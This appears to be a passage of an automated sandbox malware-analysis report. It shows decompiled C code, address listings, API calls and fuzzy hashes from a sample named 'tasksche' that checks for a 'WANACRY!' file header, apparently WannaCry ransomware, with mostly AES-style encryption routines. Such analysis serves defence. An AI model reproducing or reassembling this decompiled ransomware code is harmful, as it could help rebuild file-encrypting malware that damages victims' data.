				void* _t352;
				void* _t353;
				void* _t354;

				_t352 = __ecx;
				if(_a4 == 0) {
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t283 = _a12;
				_t252 = 0x18;
				_t342 = 0x10;
				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t193 = _a16;
				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_t193 =  &_v24;
					_push(0x40d570);
					_push(_t193);
					L0040776E();
				}
				 *(_t352 + 0x3cc) = _t193;
				 *(_t352 + 0x3c8) = _t283;
				memcpy(_t352 + 0x3d0, _a8, _t193);
				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
				_t198 =  *(_t352 + 0x3c8);
				_t354 = _t353 + 0x18;
				if(_t198 == _t342) {
					_t199 =  *(_t352 + 0x3cc);
					if(_t199 != _t342) {
						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
					} else {
						_t200 = 0xa;
					}
					goto L17;
				} else {
					if(_t198 == _t252) {
						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
						L17:
						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
						L18:
						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}

















































                                                                                                                                                0x00402a83
                                                                                                                                                0x00402a85
                                                                                                                                                0x00402a8e
                                                                                                                                                0x00402a95
                                                                                                                                                0x00402a9e
                                                                                                                                                0x00402aa3
                                                                                                                                                0x00402aa4
                                                                                                                                                0x00402aa4
                                                                                                                                                0x00402aa9
                                                                                                                                                0x00402aae
                                                                                                                                                0x00402ab1
                                                                                                                                                0x00402ab4
                                                                                                                                                0x00402ac2
                                                                                                                                                0x00402ac6
                                                                                                                                                0x00402acd
                                                                                                                                                0x00402ad6
                                                                                                                                                0x00402adb
                                                                                                                                                0x00402adc
                                                                                                                                                0x00402adc
                                                                                                                                                0x00402ae1
                                                                                                                                                0x00402ae6
                                                                                                                                                0x00402af4
                                                                                                                                                0x00402af8
                                                                                                                                                0x00402aff
                                                                                                                                                0x00402b05
                                                                                                                                                0x00402b08
                                                                                                                                                0x00402b0d
                                                                                                                                                0x00402b0e
                                                                                                                                                0x00402b0e
                                                                                                                                                0x00402b14
                                                                                                                                                0x00402b23
                                                                                                                                                0x00402b2a
                                                                                                                                                0x00402b3f
                                                                                                                                                0x00402b44
                                                                                                                                                0x00402b4a
                                                                                                                                                0x00402b4f
                                                                                                                                                0x00402b75
                                                                                                                                                0x00402b7d
                                                                                                                                                0x00402b92
                                                                                                                                                0x00402b7f
                                                                                                                                                0x00402b81
                                                                                                                                                0x00402b81
                                                                                                                                                0x00000000
                                                                                                                                                0x00402b51
                                                                                                                                                0x00402b53
                                                                                                                                                0x00402b70
                                                                                                                                                0x00402b94
                                                                                                                                                0x00402b94
                                                                                                                                                0x00402b9a
                                                                                                                                                0x00402ba2
                                                                                                                                                0x00402ba3
                                                                                                                                                0x00402ba6
                                                                                                                                                0x00402bae
                                                                                                                                                0x00402bb1
                                                                                                                                                0x00402bcf
                                                                                                                                                0x00402bcf
                                                                                                                                                0x00402bd7
                                                                                                                                                0x00402bf8
                                                                                                                                                0x00402c00
                                                                                                                                                0x00402c01
                                                                                                                                                0x00402c0b
                                                                                                                                                0x00402c0e
                                                                                                                                                0x00402c12
                                                                                                                                                0x00402c15
                                                                                                                                                0x00402c17
                                                                                                                                                0x00402c1f
                                                                                                                                                0x00402c22
                                                                                                                                                0x00402c4e
                                                                                                                                                0x00402c4e
                                                                                                                                                0x00402c54
                                                                                                                                                0x00402ca5
                                                                                                                                                0x00402ca8
                                                                                                                                                0x00402e04
                                                                                                                                                0x00402e06
                                                                                                                                                0x00402e0d
                                                                                                                                                0x00402e10
                                                                                                                                                0x00402e73
                                                                                                                                                0x00402e73
                                                                                                                                                0x00402e7b
                                                                                                                                                0x00402e7b
                                                                                                                                                0x00402e18
                                                                                                                                                0x00402e1b
                                                                                                                                                0x00402e1b
                                                                                                                                                0x00402e20
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402e22
                                                                                                                                                0x00402e25
                                                                                                                                                0x00402e25
                                                                                                                                                0x00402e29
                                                                                                                                                0x00402e59
                                                                                                                                                0x00402e5b
                                                                                                                                                0x00402e5e
                                                                                                                                                0x00402e5e
                                                                                                                                                0x00402e61
                                                                                                                                                0x00402e61
                                                                                                                                                0x00402e64
                                                                                                                                                0x00402e68
                                                                                                                                                0x00402e6b
                                                                                                                                                0x00000000
                                                                                                                                                0x00402e1b
                                                                                                                                                0x00402cae
                                                                                                                                                0x00402cb5
                                                                                                                                                0x00402cb5
                                                                                                                                                0x00402cbf
                                                                                                                                                0x00402d05
                                                                                                                                                0x00402d0b
                                                                                                                                                0x00402d11
                                                                                                                                                0x00402d34
                                                                                                                                                0x00402d3a
                                                                                                                                                0x00402d3b
                                                                                                                                                0x00402d3e
                                                                                                                                                0x00402d40
                                                                                                                                                0x00402d43
                                                                                                                                                0x00402d43
                                                                                                                                                0x00402d46
                                                                                                                                                0x00402d4e
                                                                                                                                                0x00402d8f
                                                                                                                                                0x00402d95
                                                                                                                                                0x00402d9b
                                                                                                                                                0x00402d9c
                                                                                                                                                0x00402d9f
                                                                                                                                                0x00402da1
                                                                                                                                                0x00402da4
                                                                                                                                                0x00402da4
                                                                                                                                                0x00402da7
                                                                                                                                                0x00402da7
                                                                                                                                                0x00402dad
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402daf
                                                                                                                                                0x00402db5
                                                                                                                                                0x00402dbf
                                                                                                                                                0x00402dc3
                                                                                                                                                0x00402dc8
                                                                                                                                                0x00402dc9
                                                                                                                                                0x00402dcf
                                                                                                                                                0x00402ddb
                                                                                                                                                0x00402dde
                                                                                                                                                0x00402de4
                                                                                                                                                0x00402de6
                                                                                                                                                0x00402de9
                                                                                                                                                0x00402dec
                                                                                                                                                0x00402df3
                                                                                                                                                0x00402df9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402df9
                                                                                                                                                0x00000000
                                                                                                                                                0x00402db5
                                                                                                                                                0x00402d16
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402d1c
                                                                                                                                                0x00402d22
                                                                                                                                                0x00402d25
                                                                                                                                                0x00402d28
                                                                                                                                                0x00402d2a
                                                                                                                                                0x00402d2d
                                                                                                                                                0x00402d2d
                                                                                                                                                0x00000000
                                                                                                                                                0x00402dfb
                                                                                                                                                0x00402dfb
                                                                                                                                                0x00000000
                                                                                                                                                0x00402cb5
                                                                                                                                                0x00402c56
                                                                                                                                                0x00402c5c
                                                                                                                                                0x00402c6a
                                                                                                                                                0x00402c6e
                                                                                                                                                0x00402c74
                                                                                                                                                0x00402c75
                                                                                                                                                0x00402c7e
                                                                                                                                                0x00402c8b
                                                                                                                                                0x00402c91
                                                                                                                                                0x00402c93
                                                                                                                                                0x00402c96
                                                                                                                                                0x00402c9d
                                                                                                                                                0x00402ca3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402ca3
                                                                                                                                                0x00000000
                                                                                                                                                0x00402c5c
                                                                                                                                                0x00402c24
                                                                                                                                                0x00402c27
                                                                                                                                                0x00402c2d
                                                                                                                                                0x00402c2e
                                                                                                                                                0x00402c36
                                                                                                                                                0x00402c3f
                                                                                                                                                0x00402c43
                                                                                                                                                0x00402c45
                                                                                                                                                0x00402c46
                                                                                                                                                0x00402c49
                                                                                                                                                0x00402c49
                                                                                                                                                0x00402c49
                                                                                                                                                0x00000000
                                                                                                                                                0x00402c27
                                                                                                                                                0x00402bd9
                                                                                                                                                0x00402bdf
                                                                                                                                                0x00402bdf
                                                                                                                                                0x00402be4
                                                                                                                                                0x00402bea
                                                                                                                                                0x00402bea
                                                                                                                                                0x00402bea
                                                                                                                                                0x00402bec
                                                                                                                                                0x00402bed
                                                                                                                                                0x00402bf0
                                                                                                                                                0x00000000
                                                                                                                                                0x00402bdf
                                                                                                                                                0x00402bb3
                                                                                                                                                0x00402bb6
                                                                                                                                                0x00402bb6
                                                                                                                                                0x00402bbb
                                                                                                                                                0x00402bc1
                                                                                                                                                0x00402bc1
                                                                                                                                                0x00402bc1
                                                                                                                                                0x00402bc3
                                                                                                                                                0x00402bc4
                                                                                                                                                0x00402bc7
                                                                                                                                                0x00000000
                                                                                                                                                0x00402bb6
                                                                                                                                                0x00402b55
                                                                                                                                                0x00000000
                                                                                                                                                0x00402b55

                                                                                                                                                APIs
                                                                                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                                                                                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                                                                                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                                                                                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                                                                                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                                                                                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??0exception@@ExceptionThrow$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1881450474-3916222277
                                                                                                                                                • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                                                                                                                • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                                                                                                                                                • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                                                                                                                • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004014A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178filememoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                                                                                                                                                • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                                                                                                                                                • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                                                                                                                                                • String ID: WANACRY!
                                                                                                                                                • API String ID: 283026544-1240840912
                                                                                                                                                • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                                                                                                                • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                                                                                                                                                • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                                                                                                                • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214COMMONCrypto
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 55%
                                                                                                                                                			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E00402E7E(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x28;
					do {
						if(_t274 > 0) {
							_t34 =  &_v28; // 0x403b51
							_t260 =  *_t34;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_t100 =  &_v28; // 0x403b51
					_v44 =  *_t100 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                                                                                                                                                0x00403517
                                                                                                                                                0x0040351e
                                                                                                                                                0x00403528
                                                                                                                                                0x00403531
                                                                                                                                                0x00403536
                                                                                                                                                0x00403537
                                                                                                                                                0x00403537
                                                                                                                                                0x0040353c
                                                                                                                                                0x00403545
                                                                                                                                                0x00000000
                                                                                                                                                0x0040354f
                                                                                                                                                0x0040355b
                                                                                                                                                0x0040355c
                                                                                                                                                0x0040355d
                                                                                                                                                0x0040355f
                                                                                                                                                0x0040356e
                                                                                                                                                0x00403572
                                                                                                                                                0x0040357d
                                                                                                                                                0x0040358c
                                                                                                                                                0x0040358f
                                                                                                                                                0x00403592
                                                                                                                                                0x00403598
                                                                                                                                                0x0040359d
                                                                                                                                                0x004035a0
                                                                                                                                                0x004035a3
                                                                                                                                                0x004035a6
                                                                                                                                                0x004035ac
                                                                                                                                                0x004035ad
                                                                                                                                                0x004035b5
                                                                                                                                                0x004035be
                                                                                                                                                0x004035bf
                                                                                                                                                0x004035c4
                                                                                                                                                0x004035c9
                                                                                                                                                0x004035cd
                                                                                                                                                0x004035d0
                                                                                                                                                0x004035d3
                                                                                                                                                0x004035d5
                                                                                                                                                0x004035d5
                                                                                                                                                0x004035d5
                                                                                                                                                0x004035a6
                                                                                                                                                0x004035dc
                                                                                                                                                0x004035e3
                                                                                                                                                0x004035e6
                                                                                                                                                0x004035ef
                                                                                                                                                0x004035f2
                                                                                                                                                0x004035f4
                                                                                                                                                0x004035fd
                                                                                                                                                0x004035fd
                                                                                                                                                0x00403600
                                                                                                                                                0x00403608
                                                                                                                                                0x0040360b
                                                                                                                                                0x00403613
                                                                                                                                                0x00403619
                                                                                                                                                0x0040361c
                                                                                                                                                0x0040361f
                                                                                                                                                0x00403627
                                                                                                                                                0x0040363a
                                                                                                                                                0x0040363d
                                                                                                                                                0x00403660
                                                                                                                                                0x00403682
                                                                                                                                                0x00403688
                                                                                                                                                0x0040368a
                                                                                                                                                0x0040368d
                                                                                                                                                0x00403690
                                                                                                                                                0x00403690
                                                                                                                                                0x00403690
                                                                                                                                                0x0040361f
                                                                                                                                                0x004036a9
                                                                                                                                                0x004036ae
                                                                                                                                                0x004036b2
                                                                                                                                                0x004036b5
                                                                                                                                                0x004036b8
                                                                                                                                                0x004036bb
                                                                                                                                                0x004035f2
                                                                                                                                                0x004036c7
                                                                                                                                                0x004036cd
                                                                                                                                                0x004036d3
                                                                                                                                                0x004036d6
                                                                                                                                                0x004036df
                                                                                                                                                0x004036e2
                                                                                                                                                0x004036e7
                                                                                                                                                0x004036ef
                                                                                                                                                0x004036f2
                                                                                                                                                0x00403701
                                                                                                                                                0x00403709
                                                                                                                                                0x0040371f
                                                                                                                                                0x00403726
                                                                                                                                                0x00403727
                                                                                                                                                0x00403741
                                                                                                                                                0x00403745
                                                                                                                                                0x0040374a
                                                                                                                                                0x00403760
                                                                                                                                                0x00403767
                                                                                                                                                0x00403768
                                                                                                                                                0x0040377d
                                                                                                                                                0x00403780
                                                                                                                                                0x00403782
                                                                                                                                                0x00403783
                                                                                                                                                0x00403786
                                                                                                                                                0x00403787
                                                                                                                                                0x004036f2
                                                                                                                                                0x00403794

                                                                                                                                                APIs
                                                                                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                                                                                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                                                                                • String ID: $Q;@
                                                                                                                                                • API String ID: 2382887404-262343263
                                                                                                                                                • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                                                                                                                • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                                                                                                                                                • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                                                                                                                • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMONCrypto
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
